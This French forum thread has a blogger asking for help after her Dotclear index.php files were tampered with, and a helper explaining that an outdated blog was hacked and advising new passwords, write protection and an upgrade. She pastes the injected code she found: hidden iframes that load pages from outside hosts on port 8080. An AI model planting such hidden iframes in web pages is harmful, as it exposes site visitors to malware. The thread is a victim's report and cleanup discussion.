SOS mon blog dotclear a chopé un ver : HTML:Iframe.inf

[libellul333]

Je trouve ça ou le backup de base de données si jamais je l'ai?? je ne sais pas ce que c'est. donc si je comprend bien, j'ai un vrai virus vu la tournure de ta phrase "Ca ne fait pas très faux-positif, par contre comme rapport"

Je tenterai tout ça demain, je tombe de fatigue, bonne nuit et merci encore pour ta patience!

[Falkra]

Il est possible que ton fichier ne soit pas normal, de toute façon il y a un problème.

Ok, on voit ça demain, je pense que le plus sage sera d'ouvrir en parallèle une discussion sur le forum de dotclear, pour la partie web, que je suivra en parallèle ici avec toi.

[libellul333]

Je pense qu'il y a bel et bien un virus qui s'est incrusté dans mon ftp perso free, j'avais fait un "blog test" sur une autre page perso avant de faire mon vrai blog, sur le même modèle. Je suis allée récupérer l'index.php de mon "blog test", je l'ai ouvert dans le blog note et je l'ai comparé avec l'index.php du vrai blog. Quelques lignes à la fin diffèrent, l'œuvre du virus je suppose... comment est ce possible que mon fichier ai pu se modifier tout seul?

je te met la différence entre les deux pages :

fin de code index.php du blog test :

 

if ($accept_xml) {
echo '<?xml version="1.0" encoding="'.dc_encoding.'"?>'."\n";
}

# Affichage de la page
include $dc_template_file;
?>

 

Et voici la fin de l'index vérolé... Il manque le code final et 4 lignes ont été rajoutés, si tu as une explication et un moyen de sécuriser, je prend!

 

 

 

if ($accept_xml) {
echo '<?xml version="1.0" encoding="'.dc_encoding.'"?>'."\n";
}

#
<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi141" width
<iframe src="http://3f6.ru:8080/index.php" widt
<iframe src="http://39y.ru:8080/index.php" width=181 height=179 style="visibility: hidden"></iframe>

 

 

J'ai supprimé les 4 lignes et copié le code final de l'index du "blog test" à la place, remis l'index.php sur le site et le blog est revenu.

 

J'ai tenté de faire pareil pour l'index.php qui se trouve dans le dossier écrire, (page http://leblogdeluna.free.fr/ecrire/ ) ou j'ai le même problème là aussi la fin du code est différent mais ça ne marche pas

Il semblerai que ce virus soit allé modifier tous les index.php de mon blog. (dans le dossier install aussi)

donc pour l'instant le blog est revenu http://leblogdeluna.free.fr/ mais je n'ai plus de fonction écrire je ne peux plus y accéder pour rajouter de nouveaux posts.

[Falkra]

Je pense qu'il y a bel et bien un virus qui s'est incrusté dans mon ftp perso free

Les serveurs de ce type fonctionnent sous linux, ton virus était pour windows, ce n'est pas le même que dans l'autre sujet, et pas exactement un "virus", ton code les fait réagir, parce qu'une faille sur le blog a été exploitée (sur un blog pas à jour ce ne serait pas étonnant). Tu t'es fait pirater, en quelque sorte.

 

Change tes mots de passe, protège tes dossiers en écriture, et pense à faire une grosse mise à jour vers la version 2.

[libellul333]

Les serveurs de ce type fonctionnent sous linux, ton virus était pour windows, ce n'est pas le même que dans l'autre sujet, et pas exactement un "virus", ton code les fait réagir, parce qu'une faille sur le blog a été exploitée (sur un blog pas à jour ce ne serait pas étonnant). Tu t'es fait pirater, en quelque sorte.

 

Change tes mots de passe, protège tes dossiers en écriture, et pense à faire une grosse mise à jour vers la version 2.

 

oui c'est ce que je voulais dire, je me suis fait pirater je me suis mal exprimée!

[Falkra]

Ok, ben c'est bien ça alors, il faut sécuriser tout ça.

 

Le mieux serait de toute façon de migrer à la version 2, tout le monde te le dira chez eux. Et puis... le 2 est vraiment bien !

[libellul333]

Je vais essayer de remettre tout ça en ordre, réparer la fonction écrire, et aussi mon autre blog de voyage... (ils se sont acharnés sur moi, j'avais aussi un blog test sous dotclear 2 qui a été piraté également, tout le même jour, en tout ça fait 3 blogs piratés sur 4!!!) et je vais aller faire un tour sur le forum dotclear pour voir si c'est pas trop la galère de passer sur dotclear 2 en gardant mes anciennes pages... et sécuriser le tout si ils sont aussi pédagoge que toi ça devrait aller...

Modifié le 18 août 2009 par libellul333

[Falkra]

Souvent ce sont des robots automatiques qui passent, les blogs pas à jour sont vulnérables et subissent ça de cette manière.

Il y a un plugin pour DC2 qui permet de garder les anciennes urls du 1, pas de souci.

 

++

[libellul333]

Hello! Et voilà, jai posté sur dotclear comme tu m'as conseillé après une longue absence dû à un départ en vacances, j'espère que je vais pouvoir résoudre le problème. Je met l'adresse du topic vu qu'on peut éventuellement en parler en parallélé ici si le besoin s'en fait sentir.

http://forum.dotclear.net/viewtopic.php?pid=264432#p264432

[Falkra]

OK, super !